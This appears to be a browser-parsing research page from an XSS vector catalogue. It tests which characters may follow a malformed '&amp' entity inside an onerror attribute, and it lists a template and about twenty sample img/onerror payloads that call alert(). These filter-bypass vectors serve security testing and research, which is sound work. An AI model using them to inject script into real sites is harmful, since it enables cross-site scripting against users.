Characters allowed after malformed entities

This vector shows what characters are allowed after a malformed names entity.

Created Jul 1, 2024

Updated May 27, 2025

Detecting browser...

CategoryEntity Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

Template used:

<img src=data: onerror="1&amp$[chr]log($[i])">

Sample payloads

<img src=data: onerror="1&amp0x09alert(9)">

<img src=data: onerror="1&amp
alert(10)">

<img src=data: onerror="1&amp0x0Balert(11)">

<img src=data: onerror="1&amp0x0Calert(12)">

<img src=data: onerror="1&amp0x0Dalert(13)">

<img src=data: onerror="1&amp alert(32)">

<img src=data: onerror="1&amp!alert(33)">

<img src=data: onerror="1&amp&alert(38)">

<img src=data: onerror="1&amp+alert(43)">

<img src=data: onerror="1&amp-alert(45)">

<img src=data: onerror="1&amp;alert(59)">

<img src=data: onerror="1&amp~alert(126)">

<img src=data: onerror="1&amp alert(160)">

<img src=data: onerror="1&amp alert(5760)">

<img src=data: onerror="1&amp alert(8192)">

<img src=data: onerror="1&amp alert(8193)">

<img src=data: onerror="1&amp alert(8194)">

<img src=data: onerror="1&amp alert(8195)">

<img src=data: onerror="1&amp alert(8196)">

<img src=data: onerror="1&amp alert(8197)">